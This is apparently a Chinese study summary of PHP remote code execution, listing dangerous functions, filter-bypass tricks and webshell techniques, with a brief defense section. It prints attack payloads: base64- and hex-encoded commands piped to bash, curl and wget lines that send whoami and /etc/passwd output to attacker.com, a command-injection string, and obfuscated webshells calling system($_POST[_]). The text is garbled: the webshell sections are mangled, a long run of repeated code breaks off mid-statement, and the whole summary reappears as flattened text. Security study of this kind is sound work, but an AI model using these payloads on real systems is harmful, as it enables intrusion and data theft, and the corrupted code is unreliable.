RCE全覆盖总结
字数 1643 2025-08-07 08:22:02

RCE漏洞全面学习与绕过技术总结

一、RCE基础概念

RCE (Remote Code Execution) 远程代码执行漏洞,分为两种主要类型:

  • 命令执行 (Command Execution):直接执行系统命令
  • 代码执行 (Code Execution):执行特定编程语言的代码

二、PHP代码执行函数

1. 高危函数

  • eval():执行字符串作为PHP代码
  • assert():检查断言,可执行代码
  • preg_replace():使用/e修饰符时可执行代码
  • create_function():创建匿名函数
  • array_map():数组映射
  • call_user_func() / call_user_func_array():回调函数
  • array_filter():数组过滤
  • usort() / uasort():数组排序

2. 动态函数执行

$func = $_GET['func'];
$func();  // 直接调用用户控制的函数

三、系统命令执行函数

1. PHP命令执行函数

  • system():执行外部程序并显示输出
  • exec():执行外部程序
  • shell_exec():通过shell执行命令
  • passthru():执行外部程序并显示原始输出
  • popen() / proc_open():进程文件指针
  • ` ` (反引号):执行shell命令
  • pcntl_exec():在当前进程空间执行程序

2. 其他语言命令执行

  • Java: Runtime.getRuntime().exec()
  • Python: os.system(), subprocess.Popen()
  • Node.js: child_process.exec(), child_process.spawn()

四、RCE漏洞利用技术

1. 基本利用

// 直接执行
eval($_GET['code']);

// 命令执行
system($_GET['cmd']);

2. 间接利用

// 通过文件包含
include($_GET['file']);

// 通过反序列化
unserialize($_GET['data']);

五、绕过技术

1. 命令执行绕过

1.1 空格绕过

  • ${IFS}:内部字段分隔符
  • $IFS$9:$9是空变量
  • <>:重定向符号
  • %09 (tab)
  • {cmd,arg}:花括号扩展

1.2 关键字过滤绕过

  • 通配符:/???/??t /???/p??swd
  • 变量拼接: 
    a=c;b=at;c=flag;$a$b $c
  • 编码绕过:
    • Base64: echo "Y2F0IC9ldGMvcGFzc3dk"|base64 -d|bash
    • Hex: echo "636174202f6574632f706173737764"|xxd -r -p|bash
  • 反斜杠:c\at /etc/passwd
  • 引号:c'a't /etc/passwd
  • 空变量:c${x}at /etc/passwd

1.3 无回显利用

  • DNS外带:curl http://$(whoami).attacker.com
  • HTTP请求:wget http://attacker.com/$(cat /etc/passwd)
  • 延时判断:sleep 5

2. 代码执行绕过

2.1 PHP代码执行绕过

  • 短标签:<?=<?
  • 动态函数:$func = "sys"."tem"; $func("whoami");
  • 字符串拼接: 
    $a = 'syste';
$b = 'm';
($a.$b)('whoami');
  • 回调函数: 
    array_map('system', array('whoami'));
  • 反射: 
    $func = new ReflectionFunction('system');
$func->invoke('whoami');

2.2 无参数RCE

  • getallheaders() + end()
    system(end(getallheaders()));
  • get_defined_vars()
    $a = system(current(get_defined_vars()));&b=whoami
  • session_id()
    session_start();
system(hex2bin(session_id()));

3. 无字母数字Webshell

  • PHP异或运算: 
    $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // system
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // _POST
$___=

\[__; $_($___[_]); // system($_POST[_]) ``` - PHP取反: ```php $__=~('%9E'^'%FF'); // _ $___=~('%8C%86%8C%8B%9A%92'); // POST $____= \]

;
\(_____=~('%99%93%9E%98%D1%8F%97%8F'); // system\)__(\(____[_]); // system(\)POST[])


## 六、防御措施

1. 输入验证与过滤
 - 白名单验证
 - 过滤特殊字符 (`| & ; ` ` > <`)

2. 安全函数使用
 - 使用`escapeshellarg()`和`escapeshellcmd()`
 - 避免动态代码执行

3. 禁用危险函数
 - 在php.ini中禁用`eval`、`system`等函数

4. 最小权限原则
 - Web服务器以低权限用户运行

5. 使用安全替代方案
 - 使用特定API而非系统命令
 - 使用参数化查询而非字符串拼接

## 七、实战案例

### 1. 命令注入绕过
```php
// 原始漏洞代码
$cmd = "ping -c 4 ".$_GET['ip'];
system($cmd);

// 攻击payload
ip=127.0.0.1;cat${IFS}/etc/passwd

2. 无字母数字Webshell

<?php
$_=('>'>'<')+('>'>'<');
$__=$_+$_;
$____='';
$____.=$__+$__+$_;
$____.=$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$__;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$__+$__+$_+$_;
$____.=$__+$__+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.=$__+$_+$_+$_+$_+$_+$_;
$____.
RCE漏洞全面学习与绕过技术总结 一、RCE基础概念 RCE (Remote Code Execution) 远程代码执行漏洞,分为两种主要类型: 命令执行 (Command Execution):直接执行系统命令 代码执行 (Code Execution):执行特定编程语言的代码 二、PHP代码执行函数 1. 高危函数 eval() :执行字符串作为PHP代码 assert() :检查断言,可执行代码 preg_replace() :使用 /e 修饰符时可执行代码 create_function() :创建匿名函数 array_map() :数组映射 call_user_func() / call_user_func_array() :回调函数 array_filter() :数组过滤 usort() / uasort() :数组排序 2. 动态函数执行 三、系统命令执行函数 1. PHP命令执行函数 system() :执行外部程序并显示输出 exec() :执行外部程序 shell_exec() :通过shell执行命令 passthru() :执行外部程序并显示原始输出 popen() / proc_open() :进程文件指针 ` ` (反引号):执行shell命令 pcntl_exec() :在当前进程空间执行程序 2. 其他语言命令执行 Java: Runtime.getRuntime().exec() Python: os.system() , subprocess.Popen() Node.js: child_process.exec() , child_process.spawn() 四、RCE漏洞利用技术 1. 基本利用 2. 间接利用 五、绕过技术 1. 命令执行绕过 1.1 空格绕过 ${IFS} :内部字段分隔符 $IFS$9 :$9是空变量 < 或 > :重定向符号 %09 (tab) {cmd,arg} :花括号扩展 1.2 关键字过滤绕过 通配符: /???/??t /???/p??swd 变量拼接: 编码绕过: Base64: echo "Y2F0IC9ldGMvcGFzc3dk"|base64 -d|bash Hex: echo "636174202f6574632f706173737764"|xxd -r -p|bash 反斜杠: c\at /etc/passwd 引号: c'a't /etc/passwd 空变量: c${x}at /etc/passwd 1.3 无回显利用 DNS外带: curl http://$(whoami).attacker.com HTTP请求: wget http://attacker.com/$(cat /etc/passwd) 延时判断: sleep 5 2. 代码执行绕过 2.1 PHP代码执行绕过 短标签: <?= 和 <? 动态函数: $func = "sys"."tem"; $func("whoami"); 字符串拼接: 回调函数: 反射: 2.2 无参数RCE getallheaders() + end() : get_defined_vars() : session_id() : 3. 无字母数字Webshell PHP异或运算: PHP取反: 六、防御措施 输入验证与过滤 白名单验证 过滤特殊字符 ( | & ; > < ) 安全函数使用 使用 escapeshellarg() 和 escapeshellcmd() 避免动态代码执行 禁用危险函数 在php.ini中禁用 eval 、 system 等函数 最小权限原则 Web服务器以低权限用户运行 使用安全替代方案 使用特定API而非系统命令 使用参数化查询而非字符串拼接 七、实战案例 1. 命令注入绕过 2. 无字母数字Webshell